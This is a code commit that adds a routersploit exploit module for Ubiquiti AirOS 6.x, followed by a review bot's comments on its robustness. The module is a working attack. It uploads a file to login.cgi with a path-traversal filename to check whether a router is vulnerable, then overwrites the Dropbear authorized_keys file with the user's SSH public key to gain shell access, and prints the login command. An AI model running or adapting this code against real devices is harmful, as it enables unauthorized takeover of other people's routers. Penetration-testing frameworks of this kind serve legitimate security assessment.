Added exploit module to ubiquiti AirOS 6.x

parent f2d8155b
import string, random, requests, tempfile, os.path
from routersploit import (
exploits,
print_success,
print_error,
print_info,
random_text,
sanitize_url,
http_request,
mute,
)
class Exploit(exploits.Exploit):
'''
Exploit implementation for AirOS 6.x - Arbitrary File Upload.
If the target is vulnerable is possible to take full control of the router
'''
__info__ = {
'name': 'AirOS 6.x - Arbitrary File Upload',
'description': 'Exploit implementation for AirOS 6.x - Arbitrary File Upload. If the target is vulnerable is possible to take full control of the router',
'authors': [
'93c08539', #Vulnerability discovery
'Vinicius Henrique Marangoni' #routersploit module
],
'references': [
'https://hackerone.com/reports/73480',
'https://www.exploit-db.com/exploits/39701/'
],
'targets': [
'AirOS 6.x'
]
}
target = exploits.Option('', 'Target address e.g. https://192.168.1.1') #Target address
port = exploits.Option(80, 'Target port') #Default port
#Disable certificate verification warnings
requests.packages.urllib3.disable_warnings()
def run(self):
if(self.check()):
print_success('Target is vulnerable')
print_success('Trying to exploit by uploading SSH public key')
if(os.path.isfile(os.path.expanduser('~/.ssh/id_rsa.pub'))):
upload_params = {'file': ('../../etc/dropbear/authorized_keys', open(os.path.expanduser('~/.ssh/id_rsa.pub')), {'Expect': ''})}
try:
url = sanitize_url('{0}:{1}/' .format(self.target, self.port))
requests.post(url + 'login.cgi', files=upload_params, verify=False)
except Exception, e:
print e
print_error('Something wrong happened while uploading SSH public key')
else:
print_success('Appareantly the exploit worked fine')
print_success('Try the following command to connect to router')
ip_target = self.target.replace('https://', '')
ip_target = ip_target.replace('http://', '/')
ip_target = ip_target.replace('/', '')
print_info('ssh {0} -l ubnt' .format(ip_target))
else:
print_error('The SSH public key does not exist. You must to generate it')
else:
print_error('Target is not vulnerable')
@mute
def check(self):
url = sanitize_url('{0}:{1}/' .format(self.target, self.port))
response = http_request(url=url + 'login.cgi', method='GET')
if(response is None):
return False #Target not vulnerable
rand_str = random_text(length=16)
tmp_payload = tempfile.TemporaryFile()
tmp_payload.write('vulnerable' + rand_str)
tmp_payload.seek(0)
upload_params = {'file': ('../../../../tmp/airview.uavr', tmp_payload, {'Expect': ''})}
try:
requests.post(url + 'login.cgi', files=upload_params, verify=False)
tmp_payload.close()
except requests.exceptions.RequestException:
tmp_payload.close()
return False #Target not vulnerable
#Response to verify if the upload was done correctly
verify_upload = http_request(url=url + 'airview.uavr', method='GET')
#Upload empty file to "clear" the airview.uavr file
clean_tmp_file = tempfile.TemporaryFile()
clean_tmp_file.write('')
clean_tmp_file.seek(0)
upload_params = {'file': ('../../../../tmp/airview.uavr', clean_tmp_file, {'Expect': ''})}
try:
requests.post(url + 'login.cgi' .format(self.target), files=upload_params, verify=False)
clean_tmp_file.close()
except requests.exceptions.RequestException:
clean_tmp_file.close()
if('vulnerable'+rand_str in verify_upload.text):
return True
else:
return False
\ No newline at end of file
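Review bot: In `check()`, the final comparison reads `verify_upload.text` without a None test, even though the first `http_request` call in the same method is guarded by `if(response is None)`, which suggests the helper can return None. If the GET for `airview.uavr` fails, the method would raise AttributeError instead of reporting "not vulnerable"; add `if verify_upload is None: return False` just before the final `if`, so the cleanup upload still runs first. Separately, `requests.packages.urllib3.disable_warnings()` sits in the class body, so it executes at import time and silences certificate warnings for the whole process rather than for this module's requests only. It would be better scoped to the calls that pass `verify=False`, with a comment stating that validation is deliberately disabled. `run()` also opens `~/.ssh/id_rsa.pub` without ever closing it (a `with open(...) as key_file:` block around the POST would fix that), and the imports `string` and `random` appear unused.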